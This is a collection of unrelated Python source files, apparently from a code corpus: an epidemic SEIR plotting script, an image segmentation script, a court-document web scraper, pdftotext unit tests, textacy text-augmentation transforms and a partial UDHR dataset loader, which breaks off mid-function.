#### File: 8-vishal/Covid-19_Visualizer/main.py ```python import numpy from scipy.integrate import odeint import matplotlib.pyplot as plt from utilities import Infected beta = 0.2 # Contact rate sigma = 1 / 14 # 1/Latent Period (Latent Rate) gama = 1 / 31 # 1/Recovery Period (Recovery Rate) def coronaCases(x, t): n = numpy.sum(x) s = x[0] e = x[1] i = x[2] dsdt = -(beta * s * i / n) dedt = (beta * s * i / n) - (sigma * e) didt = sigma * e - gama * i drdt = gama * i return [dsdt, dedt, didt, drdt] def Initial_data(Infected, Recovered, Deceased): suspectibles = (beta/gama)*Infected expected = sigma * beta * suspectibles / sigma * gama return [suspectibles, expected, Infected, Recovered] t = numpy.linspace(0, 90, 90) # Plotting for 90 days starting from today x = odeint(coronaCases, Initial_data(Infected("Todays_data.csv", "KL"), 270, 2), t) S = x[:, 0] E = x[:, 1] I = x[:, 2] R = x[:, 3] plt.ylabel('Peoples in Thousands') plt.xlabel('Days') plt.plot(t, S, label="suspectibles") plt.plot(t, E, label="exposed") plt.plot(t, I, label="infected") plt.plot(t, R, label="recovered") plt.legend(loc='best') plt.show() ```
{ "source": "8-vishal/Segmentation-using-potts-and-hierarchical-bayesian-model", "score": 3 }
#### File: 8-vishal/Segmentation-using-potts-and-hierarchical-bayesian-model/main.py ```python import numpy import math import cv2 import random import matplotlib from scipy.special import gamma import matplotlib.pyplot as plt from functions import * matplotlib.use("TkAgg") def inverse_gamma(data, alpha=0.1, beta=0.1): """ Inverse gamma distributions :param data: Data value :param alpha: alpha value :param beta: beta value :return: Inverse gamma distributiion """ return (pow(beta, alpha) / math.gamma(alpha)) *\ pow(alpha, data-1) * math.exp(-beta/data) def shape_scale(): """ Generate shape and scale params :return: """ pre_shape = numpy.random.uniform(0, 3, 16) pre_scale = numpy.random.uniform(0, 3, 16) shape = [inverse_gamma(i) for i in pre_shape] scale = [inverse_gamma(j) for j in pre_scale] return shape, scale def noise_variance(): """ Noise varriance sampled in inverse gamma distribution :return: Sampled Noise """ var_list = numpy.arange(0, 3.2, 0.2) var = inverse_gamma(random.choice(var_list)) return numpy.random.normal(0, var, (512, 512)) def GGD(shape, scale, path): """ Generalised gaussian distribution of input image :param shape: Shape param of GGD :param scale: Scale param of GGD :param path: Path to image :return: Approximate GGD image """ def ggd(x): p1 = 2 * pow(scale, 1 / shape) * gamma(1 + 1 / shape) p2 = math.exp(-pow(abs(x), shape) / scale) return (1 / p1) * p2 mat = cv2.imread(path, 0) mat = cv2.resize(mat, (512, 512)) mata = numpy.zeros(mat.shape) for i in range(len(mat)): for j in range(len(mat)): mata[i][j] = ggd(mat[i][j]) return mat, mata def potts_label_map_trf(image): """ Find Label Map for the ground truth image :param image: Path to Image :return: Approximate segmented and labels for segmentation """ img = cv2.imread(image, 0) img = cv2.resize(img, (512, 512)) im = img.copy() '''labels = numpy.zeros((512, 512)) for x in range(1, 511): for y in range(1, 511): if (im[x, y - 1] - 5 < im[x, y] < im[x, y - 1] + 5) and\ (im[x, y + 1] - 5 < im[x, y] < im[x, y + 1] + 5): im[x, y] = im[x, y - 1] labels[x, y] = 0 elif (im[x - 1, y] - 40 < im[x, y] < im[x - 1, y] + 40) and\ (im[x + 1, y] - 40 < im[x, y] < im[x + 1, y] + 40): im[x, y] = im[x - 1, y] labels[x, y] = 1''' return energy_calc_1D(im) def Segment(img): """ Segment the image based on POTTS model :param img: Approximated Image :return: Segmented image in 4 classes """ out = img.copy() for i in range(len(img)): for j in range(len(img)): if img[i, j] in range(0, 41): out[i, j] = 0 elif img[i, j] in range(41, 100): out[i, j] = 1 elif img[i, j] in range(150, 255): out[i, j] = 2 else: out[i, j] = 3 return out def plot(path): orig, approx = GGD(0.1, 0.1, path) approx_seg, labels = potts_label_map_trf(path) final_segment = Segment(approx_seg) plt.figure(figsize=(20, 10)) plt.legend() plt.subplot(221) plt.imshow(orig, cmap='gray'), plt.title("Original Image") plt.subplot(222) plt.imshow(approx, cmap='gray'), plt.title("GGD approximated Image") plt.subplot(223) plt.imshow(approx_seg, cmap='gray'), plt.title("TRF segmented Image") plt.subplot(224) plt.imshow(final_segment, cmap='jet'), plt.title("Final Segmented Image") plt.show() if __name__ == "__main__": # To run the code just change the path and input path of the image. # For windows last line of code will be like - plot(path=r".\us_images\18-19-54.jpg") # For linux last line of code will be like - plot(path="./us_images/18-19-54.jpg") plot(path="./us_images/18-19-54.jpg") ```
{ "source": "8W9aG/LawScraper", "score": 3 }
#### File: lawscraper/spiders/hcourt.py ```python import typing import re from io import BytesIO import scrapy import pdftotext from dateutil.parser import * CASE_NAME = 'caseName' CASE_NUMBER = 'caseNumber' ENTITY_NAME = 'entityName' ENTITY_CLASS = 'entityClass' DOCUMENT_NAME = 'documentName' DATE = 'date' class HCourt(scrapy.Spider): name = "hcourt" start_urls = [ "https://www.hcourt.gov.au/cases/cases-heard" ] allowed_domains = [ "hcourt.gov.au" ] def parse( self, response: scrapy.http.Response ) -> typing.Generator[scrapy.Request, None, None]: """Find all the cases.""" for case_url in response.xpath('//table[@class="cases"]/tbody/tr/td/a/@href'): url = response.urljoin(case_url.extract()) yield scrapy.Request( url=url, callback=self.parse_case, dont_filter=True, ) def parse_case( self, response: scrapy.http.Response ) -> typing.Generator[scrapy.Request, None, None]: """Find all the documents in the case.""" item_full_text_div = response.xpath('//div[@class="itemFullText"]')[0] case_name = item_full_text_div.xpath('./h2/text()')[0].extract().strip() case_number = response.xpath('//h1[@class="itemTitle"]/text()')[0].extract().strip() for paragraph in item_full_text_div.xpath('./p'): paragraph_text = paragraph.xpath('string(.)').extract()[0] link = paragraph.xpath('./a') if not link: continue document_url = link[-1].xpath('./@href')[0] url = response.urljoin(document_url.extract()) date = paragraph_text.split()[0] try: parse(date) except: continue entity_name = '' entity_class = '' braces = re.findall(r"\(.*?\)", paragraph_text) if braces: brace_text = braces[0].replace("(", "").replace(")", "") braces_split = [x.strip() for x in brace_text.split("-")] entity_name = braces_split[-1] if len(braces_split) > 1: entity_class = braces_split[0] document_name = link[-1].xpath('./text()').extract() yield scrapy.Request( url=url, callback=self.parse_document, meta={ CASE_NAME: case_name, CASE_NUMBER: case_number, ENTITY_NAME: entity_name, ENTITY_CLASS: entity_class, DOCUMENT_NAME: document_name, DATE: date, }, ) def parse_document( self, response: scrapy.http.Response ) -> typing.Generator[scrapy.Request, None, None]: """Parse the document from a case.""" if not isinstance(response, scrapy.http.TextResponse): pdf = pdftotext.PDF(BytesIO(response.body)) text = "\n\n".join(pdf) yield { 'text': text, 'url': response.url, CASE_NAME: response.meta[CASE_NAME], CASE_NUMBER: response.meta[CASE_NUMBER], ENTITY_NAME: response.meta[ENTITY_NAME], ENTITY_CLASS: response.meta[ENTITY_CLASS], DOCUMENT_NAME: response.meta[DOCUMENT_NAME], DATE: response.meta[DATE], } ```
{ "source": "8W9aG/pdftotext", "score": 3 }
#### File: pdftotext/tests/test_pdf.py ```python import io import pkg_resources import unittest import pdftotext file_names = [ "abcde.pdf", "blank.pdf", "both_passwords.pdf", "corrupt.pdf", "corrupt_page.pdf", "landscape_0.pdf", "landscape_90.pdf", "portrait.pdf", "table.pdf", "three_columns.pdf", "two_pages.pdf", "user_password.pdf", ] test_files = {} for file_name in file_names: file_path = pkg_resources.resource_filename("tests", file_name) with open(file_path, "rb") as open_file: test_files[file_name] = io.BytesIO(open_file.read()) def get_file(name): """Return a copy of the requested test file as if it were just opened.""" return io.BytesIO(test_files[name].getvalue()) class InitTest(unittest.TestCase): """Test using and abusing __init__.""" def test_double_init_success(self): pdf = pdftotext.PDF(get_file("abcde.pdf")) pdf.__init__(get_file("blank.pdf")) self.assertEqual(len(pdf), 1) def test_double_init_failure(self): pdf = pdftotext.PDF(get_file("blank.pdf")) with self.assertRaises(AttributeError): pdf.__init__("wrong") def test_init_file_in_text_mode(self): text_file = io.StringIO(u"wrong") with self.assertRaises((pdftotext.Error, TypeError)): pdftotext.PDF(text_file) def test_init_invalid_pdf_file(self): pdf_file = io.BytesIO(b"wrong") with self.assertRaises(pdftotext.Error): pdftotext.PDF(pdf_file) def test_init_corrupt_pdf_file(self): with self.assertRaises(pdftotext.Error): pdftotext.PDF(get_file("corrupt.pdf")) def test_no_init(self): class BrokenPDF(pdftotext.PDF): def __init__(self): pass pdf = BrokenPDF() self.assertEqual(len(pdf), 0) def test_locked_with_only_user_password(self): with self.assertRaises(pdftotext.Error): pdftotext.PDF(get_file("user_password.pdf")) def test_locked_with_only_user_password_user_unlock(self): pdf = pdftotext.PDF(get_file("user_password.pdf"), "user_password") self.assertIn("secret", pdf[0]) def test_locked_with_both_passwords(self): with self.assertRaises(pdftotext.Error): pdftotext.PDF(get_file("both_passwords.pdf")) def test_locked_with_both_passwords_user_unlock(self): pdf = pdftotext.PDF(get_file("both_passwords.pdf"), "user_password") self.assertIn("secret", pdf[0]) def test_locked_with_both_passwords_owner_unlock(self): pdf = pdftotext.PDF(get_file("both_passwords.pdf"), "owner_password") self.assertIn("secret", pdf[0]) class GetItemTest(unittest.TestCase): """Test the __getitem__ method.""" def test_read(self): pdf = pdftotext.PDF(get_file("abcde.pdf")) result = pdf[0] self.assertIn("abcde", result) def test_read_portrait(self): pdf = pdftotext.PDF(get_file("portrait.pdf")) result = pdf[0] self.assertIn("a", result) self.assertIn("b", result) self.assertIn("c", result) self.assertIn("d", result) def test_read_landscape_0(self): pdf = pdftotext.PDF(get_file("landscape_0.pdf")) result = pdf[0] self.assertIn("a", result) self.assertIn("b", result) self.assertIn("c", result) self.assertIn("d", result) def test_read_landscape_90(self): pdf = pdftotext.PDF(get_file("landscape_90.pdf")) result = pdf[0] self.assertIn("a", result) self.assertIn("b", result) self.assertIn("c", result) self.assertIn("d", result) @unittest.skip("skip until all test runners have poppler >= 0.88") def test_read_columns(self): pdf = pdftotext.PDF(get_file("three_columns.pdf")) page = pdf[0] col1_index = page.index("column 1") one_index = page.index("one") col2_index = page.index("column 2") two_index = page.index("two") col3_index = page.index("column 3") three_index = page.index("three") self.assertLess(col1_index, one_index) self.assertLess(one_index, col2_index) self.assertLess(col2_index, two_index) self.assertLess(two_index, col3_index) self.assertLess(col3_index, three_index) def test_no_doc_to_read(self): class BrokenPDF(pdftotext.PDF): def __init__(self): pass pdf = BrokenPDF() with self.assertRaises(IndexError): pdf[0] def test_pdf_read_invalid_page_number(self): pdf = pdftotext.PDF(get_file("blank.pdf")) with self.assertRaises(IndexError): pdf[100] def test_pdf_read_wrong_arg_type(self): pdf = pdftotext.PDF(get_file("blank.pdf")) with self.assertRaises(TypeError): pdf["wrong"] def test_read_corrupt_page(self): with self.assertRaises((pdftotext.Error, IndexError)): pdf = pdftotext.PDF(get_file("corrupt_page.pdf")) pdf[0] def test_read_page_two(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) result = pdf[1] self.assertIn("two", result) class LengthTest(unittest.TestCase): """Test the __len__ method.""" def test_length_one(self): pdf = pdftotext.PDF(get_file("blank.pdf")) self.assertEqual(len(pdf), 1) def test_length_two(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) self.assertEqual(len(pdf), 2) def test_length_no_doc(self): class BrokenPDF(pdftotext.PDF): def __init__(self): pass pdf = BrokenPDF() self.assertEqual(len(pdf), 0) class ListTest(unittest.TestCase): """Test iterating over pages.""" def test_list_first_element(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) self.assertIn("one", pdf[0]) def test_list_second_element(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) self.assertIn("two", pdf[1]) def test_list_invalid_element(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) with self.assertRaises(IndexError): pdf[2] def test_list_last_element(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) self.assertIn("two", pdf[-1]) def test_for_loop(self): pdf = pdftotext.PDF(get_file("two_pages.pdf")) result = "" for page in pdf: result = result + page self.assertIn("one", result) self.assertIn("two", result) class RawTest(unittest.TestCase): """Test reading in raw layout.""" def test_raw_vs_not(self): filename = "table.pdf" pdf = pdftotext.PDF(get_file(filename)) raw_pdf = pdftotext.PDF(get_file(filename), raw=True) self.assertNotEqual(pdf[0], raw_pdf[0]) def test_raw_invalid_type(self): with self.assertRaises(TypeError): pdftotext.PDF(get_file("blank.pdf"), raw="") def test_raw_invalid_value(self): with self.assertRaises(ValueError): pdftotext.PDF(get_file("blank.pdf"), raw=100) def test_raw_is_not_default(self): filename = "table.pdf" pdf_default = pdftotext.PDF(get_file(filename)) pdf_raw_false = pdftotext.PDF(get_file(filename), raw=False) self.assertEqual(pdf_default[0], pdf_raw_false[0]) class PhysicalTest(unittest.TestCase): """Test reading in physical layout.""" @unittest.skip("skip until all test runners have poppler >= 0.88") def test_physical_vs_not(self): filename = "three_columns.pdf" pdf = pdftotext.PDF(get_file(filename)) physical_pdf = pdftotext.PDF(get_file(filename), physical=True) self.assertNotEqual(pdf[0], physical_pdf[0]) def test_physical_invalid_type(self): with self.assertRaises(TypeError): pdftotext.PDF(get_file("blank.pdf"), physical="") def test_physical_invalid_value(self): with self.assertRaises(ValueError): pdftotext.PDF(get_file("blank.pdf"), physical=-10) def test_physical_is_not_default(self): filename = "three_columns.pdf" pdf_default = pdftotext.PDF(get_file(filename)) pdf_physical_false = pdftotext.PDF(get_file(filename), physical=False) self.assertEqual(pdf_default[0], pdf_physical_false[0]) def test_raw_and_physical(self): with self.assertRaises(ValueError): pdftotext.PDF(get_file("blank.pdf"), raw=True, physical=True) def test_raw_vs_physical(self): filename = "three_columns.pdf" pdf_raw = pdftotext.PDF(get_file(filename), raw=True) pdf_physical = pdftotext.PDF(get_file(filename), physical=True) self.assertNotEqual(pdf_raw[0], pdf_physical[0]) ```
{ "source": "8W9aG/textacy", "score": 3 }
#### File: textacy/augmentation/transforms.py ```python import random from typing import cast, List, Optional, Set, Union from cytoolz import itertoolz from .. import errors, utils from . import utils as aug_utils def substitute_word_synonyms( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, pos: Optional[Union[str, Set[str]]] = None, ) -> List[aug_utils.AugTok]: """ Randomly substitute words for which synonyms are available with a randomly selected synonym, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through synonym substitution. num: If int, maximum number of words with available synonyms to substitute with a randomly selected synonym; if float, probability that a given word with synonyms will be substituted. pos: Part of speech tag(s) of words to be considered for augmentation. If None, all words with synonyms are considered. Returns: New, augmented sequence of tokens. Note: This transform requires :class:`textacy.resources.ConceptNet` to be downloaded to work properly, since this is the data source for word synonyms to be substituted. """ _validate_aug_toks(aug_toks) pos = cast(Set[str], utils.to_collection(pos, str, set)) cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.syns and (pos is None or aug_tok.pos in pos) ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: new_aug_toks.append( aug_utils.AugTok( text=random.choice(aug_tok.syns), ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, # TODO: re-fetch syns? use []? ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def insert_word_synonyms( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, pos: Optional[Union[str, Set[str]]] = None, ) -> List[aug_utils.AugTok]: """ Randomly insert random synonyms of tokens for which synonyms are available, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through synonym insertion. num: If int, maximum number of words with available synonyms from which a random synonym is selected and randomly inserted; if float, probability that a given word with synonyms will provide a synonym to be inserted. pos: Part of speech tag(s) of words to be considered for augmentation. If None, all words with synonyms are considered. Returns: New, augmented sequence of tokens. Note: This transform requires :class:`textacy.resources.ConceptNet` to be downloaded to work properly, since this is the data source for word synonyms to be inserted. """ _validate_aug_toks(aug_toks) pos = cast(Set[str], utils.to_collection(pos, str, set)) # bail out on very short sentences to avoid clobbering meaning if len(aug_toks) < 3: return aug_toks[:] cand_aug_toks = [ aug_tok for aug_tok in aug_toks if aug_tok.syns and (pos is None or aug_tok.pos in pos) ] rand_aug_toks = _select_random_candidates(cand_aug_toks, num) rand_idxs = random.sample(range(len(aug_toks)), len(rand_aug_toks)) if not rand_idxs: return aug_toks[:] rand_aug_toks = iter(rand_aug_toks) new_aug_toks: List[aug_utils.AugTok] = [] # NOTE: https://github.com/python/mypy/issues/5492 padded_pairs = itertoolz.sliding_window(2, [None] + aug_toks) # type: ignore for idx, (prev_tok, curr_tok) in enumerate(padded_pairs): if idx in rand_idxs: rand_aug_tok = next(rand_aug_toks) if prev_tok: # use previous token's whitespace for inserted synonym new_tok_ws = prev_tok.ws if prev_tok.is_word and not prev_tok.ws: # previous token should have whitespace, if a word new_aug_toks[-1] = aug_utils.AugTok( text=prev_tok.text, ws=" ", pos=prev_tok.pos, is_word=True, syns=prev_tok.syns, ) else: new_tok_ws = " " new_aug_toks.append( aug_utils.AugTok( text=random.choice(rand_aug_tok.syns), ws=new_tok_ws, pos=rand_aug_tok.pos, is_word=rand_aug_tok.is_word, syns=rand_aug_tok.syns, # TODO: re-fetch syns? use []? ) ) new_aug_toks.append(curr_tok) return new_aug_toks def swap_words( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, pos: Optional[Union[str, Set[str]]] = None, ) -> List[aug_utils.AugTok]: """ Randomly swap the positions of two *adjacent* words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through position swapping. num: If int, maximum number of adjacent word pairs to swap; if float, probability that a given word pair will be swapped. pos: Part of speech tag(s) of words to be considered for augmentation. If None, all words are considered. Returns: New, augmented sequence of tokens. """ _validate_aug_toks(aug_toks) pos = cast(Set[str], utils.to_collection(pos, str, set)) # if we don't require _adjacent_ words, this does the trick # if not pos: # pos = set(aug_tok.pos for aug_tok in aug_toks if aug_tok.is_word) # cand_idx_pairs = list( # itertools.chain.from_iterable( # itertools.combinations( # (idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.pos == pos_), # 2, # ) # for pos_ in pos # ) # ) cand_idxs = ( idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and (pos is None or aug_tok.pos in pos) ) cand_idx_pairs = [ (idx1, idx2) for idx1, idx2 in itertoolz.sliding_window(2, cand_idxs) if idx2 - idx1 == 1 ] rand_idx_pairs = _select_random_candidates(cand_idx_pairs, num) if not rand_idx_pairs: return aug_toks[:] new_aug_toks = aug_toks[:] for idx1, idx2 in rand_idx_pairs: tok1 = new_aug_toks[idx1] tok2 = new_aug_toks[idx2] new_aug_toks[idx1] = aug_utils.AugTok( text=tok2.text, ws=tok1.ws, pos=tok2.pos, is_word=tok2.is_word, syns=tok2.syns, ) new_aug_toks[idx2] = aug_utils.AugTok( text=tok1.text, ws=tok2.ws, pos=tok1.pos, is_word=tok1.is_word, syns=tok1.syns, ) return new_aug_toks def delete_words( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, pos: Optional[Union[str, Set[str]]] = None, ) -> List[aug_utils.AugTok]: """ Randomly delete words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through word deletion. num: If int, maximum number of words to delete; if float, probability that a given word will be deleted. pos: Part of speech tag(s) of words to be considered for augmentation. If None, all words are considered. Returns: New, augmented sequence of tokens. """ _validate_aug_toks(aug_toks) pos = cast(Set[str], utils.to_collection(pos, str, set)) # bail out on very short sentences to avoid clobbering meaning if len(aug_toks) < 3: return aug_toks[:] cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and (pos is None or aug_tok.pos in pos) and idx > 0 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] new_aug_toks: List[aug_utils.AugTok] = [] # NOTE: https://github.com/python/mypy/issues/5492 padded_triplets = itertoolz.sliding_window( 3, [None] + aug_toks + [None], # type: ignore ) for idx, (prev_tok, curr_tok, next_tok) in enumerate(padded_triplets): if idx in rand_idxs: # special case: word then [deleted word] then punctuation # give deleted word's whitespace to previous word if prev_tok and next_tok and prev_tok.is_word and not next_tok.is_word: new_aug_toks[-1] = aug_utils.AugTok( text=prev_tok.text, ws=curr_tok.ws, pos=prev_tok.pos, is_word=prev_tok.is_word, syns=prev_tok.syns, ) else: new_aug_toks.append(curr_tok) return new_aug_toks def substitute_chars( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, lang: Optional[str] = None, ) -> List[aug_utils.AugTok]: """ Randomly substitute a single character in randomly-selected words with another, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through character substitution. num: If int, maximum number of words to modify with a random character substitution; if float, probability that a given word will be modified. lang: Standard, two-letter language code corresponding to ``aug_toks``. Used to load a weighted distribution of language-appropriate characters that are randomly selected for substitution. More common characters are more likely to be substituted. If not specified, ascii letters and digits are randomly selected with equal probability. Returns: New, augmented sequence of tokens. Note: This transform requires :class:`textacy.datasets.UDHR` to be downloaded to work properly, since this is the data source for character weights when deciding which char(s) to insert. """ _validate_aug_toks(aug_toks) char_weights = aug_utils.get_char_weights(lang or "xx") cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and len(aug_tok.text) >= 3 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] rand_chars = iter( random.choices( [char for char, _ in char_weights], weights=[weight for _, weight in char_weights], k=len(rand_idxs), ) ) new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: text_list = list(aug_tok.text) rand_char_idx = random.choice(range(len(text_list))) text_list[rand_char_idx] = next(rand_chars) new_aug_toks.append( aug_utils.AugTok( text="".join(text_list), ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def insert_chars( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, lang: Optional[str] = None, ) -> List[aug_utils.AugTok]: """ Randomly insert a character into randomly-selected words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through character insertion. num: If int, maximum number of words to modify with a random character insertion; if float, probability that a given word will be modified. lang: Standard, two-letter language code corresponding to ``aug_toks``. Used to load a weighted distribution of language-appropriate characters that are randomly selected for substitution. More common characters are more likely to be substituted. If not specified, ascii letters and digits are randomly selected with equal probability. Returns: New, augmented sequence of tokens. Note: This transform requires :class:`textacy.datasets.UDHR` to be downloaded to work properly, since this is the data source for character weights when deciding which char(s) to insert. """ _validate_aug_toks(aug_toks) char_weights = aug_utils.get_char_weights(lang or "xx") cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and len(aug_tok.text) >= 3 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] rand_chars = iter( random.choices( [char for char, _ in char_weights], weights=[weight for _, weight in char_weights], k=len(rand_idxs), ) ) new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: text_list = list(aug_tok.text) rand_char_idx = random.choice(range(len(text_list))) text_list.insert(rand_char_idx, next(rand_chars)) new_aug_toks.append( aug_utils.AugTok( text="".join(text_list), ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def swap_chars( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, ) -> List[aug_utils.AugTok]: """ Randomly swap two *adjacent* characters in randomly-selected words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through character swapping. num: If int, maximum number of words to modify with a random character swap; if float, probability that a given word will be modified. Returns: New, augmented sequence of tokens. """ _validate_aug_toks(aug_toks) cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and len(aug_tok.text) >= 3 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: text_list = list(aug_tok.text) idx = random.choice(range(1, len(text_list))) text_list[idx - 1], text_list[idx] = text_list[idx], text_list[idx - 1] new_aug_toks.append( aug_utils.AugTok( text="".join(text_list), ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def delete_chars( aug_toks: List[aug_utils.AugTok], *, num: Union[int, float] = 1, ) -> List[aug_utils.AugTok]: """ Randomly delete a character in randomly-selected words, up to ``num`` times or with a probability of ``num``. Args: aug_toks: Sequence of tokens to augment through character deletion. num: If int, maximum number of words to modify with a random character deletion; if float, probability that a given word will be modified. Returns: New, augmented sequence of tokens. """ _validate_aug_toks(aug_toks) cand_idxs = [ idx for idx, aug_tok in enumerate(aug_toks) if aug_tok.is_word and len(aug_tok.text) >= 3 ] rand_idxs = set(_select_random_candidates(cand_idxs, num)) if not rand_idxs: return aug_toks[:] new_aug_toks = [] for idx, aug_tok in enumerate(aug_toks): if idx in rand_idxs: rand_char_idx = random.choice(range(len(aug_tok.text))) text = "".join( char for char_idx, char in enumerate(aug_tok.text) if char_idx != rand_char_idx ) new_aug_toks.append( aug_utils.AugTok( text=text, ws=aug_tok.ws, pos=aug_tok.pos, is_word=aug_tok.is_word, syns=aug_tok.syns, ) ) else: new_aug_toks.append(aug_tok) return new_aug_toks def _validate_aug_toks(aug_toks): if not (isinstance(aug_toks, list) and isinstance(aug_toks[0], aug_utils.AugTok)): raise TypeError( errors.type_invalid_msg("aug_toks", type(aug_toks), List[aug_utils.AugTok]) ) def _select_random_candidates(cands, num): """ Args: cands (List[obj]) num (int or float) Returns: List[obj] """ if isinstance(num, int) and num >= 0: rand_cands = random.sample(cands, min(num, len(cands))) elif isinstance(num, float) and 0.0 <= num <= 1.0: rand_cands = [cand for cand in cands if random.random() < num] else: raise ValueError( f"num={num} is invalid; must be an int >= 0 or a float in [0.0, 1.0]" ) return rand_cands ``` #### File: textacy/datasets/udhr.py ```python import io import itertools import logging import pathlib import xml from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union from .. import constants, preprocessing, utils from .. import io as tio from .base import Dataset LOGGER = logging.getLogger(__name__) NAME = "udhr" META = { "site_url": "http://www.ohchr.org/EN/UDHR", "description": ( "A collection of translations of the Universal Declaration of Human Rights (UDHR), " "a milestone document in the history of human rights that first, formally established " "fundamental human rights to be universally protected." ), } DOWNLOAD_URL = "https://unicode.org/udhr/assemblies/udhr_txt.zip" class UDHR(Dataset): """ Stream a collection of UDHR translations from disk, either as texts or text + metadata pairs. Download the data (one time only!), saving and extracting its contents to disk:: >>> import textacy.datasets >>> ds = textacy.datasets.UDHR() >>> ds.download() >>> ds.info {'name': 'udhr', 'site_url': 'http://www.ohchr.org/EN/UDHR', 'description': 'A collection of translations of the Universal Declaration of Human Rights (UDHR), a milestone document in the history of human rights that first, formally established fundamental human rights to be universally protected.'} Iterate over translations as texts or records with both text and metadata:: >>> for text in ds.texts(limit=5): ... print(text[:500]) >>> for text, meta in ds.records(limit=5): ... print("\\n{} ({})\\n{}".format(meta["lang_name"], meta["lang"], text[:500])) Filter translations by language, and note that some languages have multiple translations:: >>> for text, meta in ds.records(lang="en"): ... print("\\n{} ({})\\n{}".format(meta["lang_name"], meta["lang"], text[:500])) >>> for text, meta in ds.records(lang="zh"): ... print("\\n{} ({})\\n{}".format(meta["lang_name"], meta["lang"], text[:500])) Note: Streaming translations into a :class:`textacy.Corpus <textacy.corpus.Corpus>` doesn't work as for other available datasets, since this dataset is multilingual. Args: data_dir (str or :class:`pathlib.Path`): Path to directory on disk under which the data is stored, i.e. ``/path/to/data_dir/udhr``. Attributes: langs (Set[str]): All distinct language codes with texts in this dataset, e.g. "en" for English. """ def __init__( self, data_dir: Union[str, pathlib.Path] = constants.DEFAULT_DATA_DIR.joinpath(NAME), ): super().__init__(NAME, meta=META) self.data_dir = utils.to_path(data_dir).resolve() self._texts_dirpath = self.data_dir.joinpath("udhr_txt") self._index_filepath = self._texts_dirpath.joinpath("index.xml") self._index = None self.langs = None def download(self, *, force: bool = False) -> None: """ Download the data as a zipped archive of language-specific text files, then save it to disk and extract its contents under the ``data_dir`` directory. Args: force: If True, download the dataset, even if it already exists on disk under ``data_dir``. """ filepath = tio.download_file( DOWNLOAD_URL, filename="udhr_txt.zip", dirpath=self.data_dir, force=force, ) if filepath: tio.unpack_archive(filepath, extract_dir=self.data_dir.joinpath("udhr_txt")) self._check_data() def _check_data(self): """Check that necessary data is found on disk, or raise an OSError.""" if not self._texts_dirpath.is_dir(): raise OSError( f"data directory {self._texts_dirpath} not found; " "has the dataset been downloaded?" ) if not self._index_filepath.is_file(): raise OSError( f"data index file {self._index_filepath} not found; " "has the dataset been downloaded?" ) @property def index(self) -> Optional[List[Dict[str, Any]]]: if not self._index: try: self._index = self._load_and_parse_index() except OSError as e: LOGGER.error(e) return self._index def _load_and_parse_index(self): """ Read in index xml file from :attr:`UDHR._index_filepath`; skip elements without valid ISO-639-1 language code or sufficient translation quality, then convert into a list of dicts with key metadata, including filenames. """ index = [] tree = xml.etree.ElementTree.parse(self._index_filepath) root = tree.getroot() for ele in root.iterfind("udhr"): iso_lang_code = ele.get("bcp47", "").split("-", 1)[0] stage = int(ele.get("stage")) if len(iso_lang_code) != 2 or stage < 3: continue else: index.append( { "filename": f"udhr_{ele.get('f')}.txt", "lang": iso_lang_code, "lang_name": ele.get("n"), } ) # get set of all available langs, so users can filter on it self.langs = {item["lang"] for item in index} return index def _load_and_parse_text_file(self, filepath): with io.open(filepath, mode="rt", encoding="utf-8") as f: text_lines = [line.strip() for line in f.readlines()] # chop off the header, if it exists try: header_idx = 